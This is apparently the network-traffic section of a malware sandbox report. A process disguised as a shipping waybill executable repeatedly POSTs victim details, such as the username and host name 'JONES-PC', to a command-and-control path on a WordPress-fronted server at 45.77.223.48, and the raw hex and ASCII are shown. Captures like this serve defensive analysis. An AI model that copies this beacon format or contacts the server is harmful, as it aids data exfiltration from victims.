                                              Apr 25, 2024 09:42:18.466968060 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:18.476464033 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:18.477210045 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:18.477312088 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:18.477408886 CEST1289INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
                                              Apr 25, 2024 09:42:18.477421999 CEST1289INData Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c
                                              Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.44976645.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:18.729352951 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:18.857623100 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:19.676090956 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:18 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:19.676172972 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:19.676260948 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:19.686048985 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:19.686269045 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:19.686423063 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:19.686562061 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:19.686760902 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:19.686810970 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:19.686980963 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.44976745.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:19.955290079 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:20.083064079 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:20.902578115 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:20 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:20.902595043 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:20.902717113 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:20.911787987 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:20.912470102 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:20.913153887 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:20.913319111 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:20.913477898 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:20.913505077 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:20.913516998 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.44976845.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:21.173515081 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:21.304595947 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:22.124806881 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:21 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:22.124870062 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:22.124936104 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:22.133994102 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:22.134406090 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:22.134527922 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:22.134689093 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:22.134879112 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:22.134891033 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:22.134922028 CEST761INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.44976945.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:22.438277960 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:22.569266081 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:23.512512922 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:22 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:23.512530088 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:23.512540102 CEST5INData Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 25, 2024 09:42:23.514379025 CEST6INData Raw: 22 20 2f 3e 0a 09
                                              Data Ascii: " />
                                              Apr 25, 2024 09:42:23.514713049 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:23.519587994 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:23.519922018 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:23.520001888 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:23.520030975 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:23.520215034 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.44977045.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:23.788777113 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:23.920108080 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:24.977608919 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:23 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:24.977785110 CEST22INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20
                                              Data Ascii: <!DOCTYPE html><html
                                              Apr 25, 2024 09:42:24.977797031 CEST37INData Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:24.977895975 CEST5INData Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 25, 2024 09:42:24.978091002 CEST6INData Raw: 22 20 2f 3e 0a 09
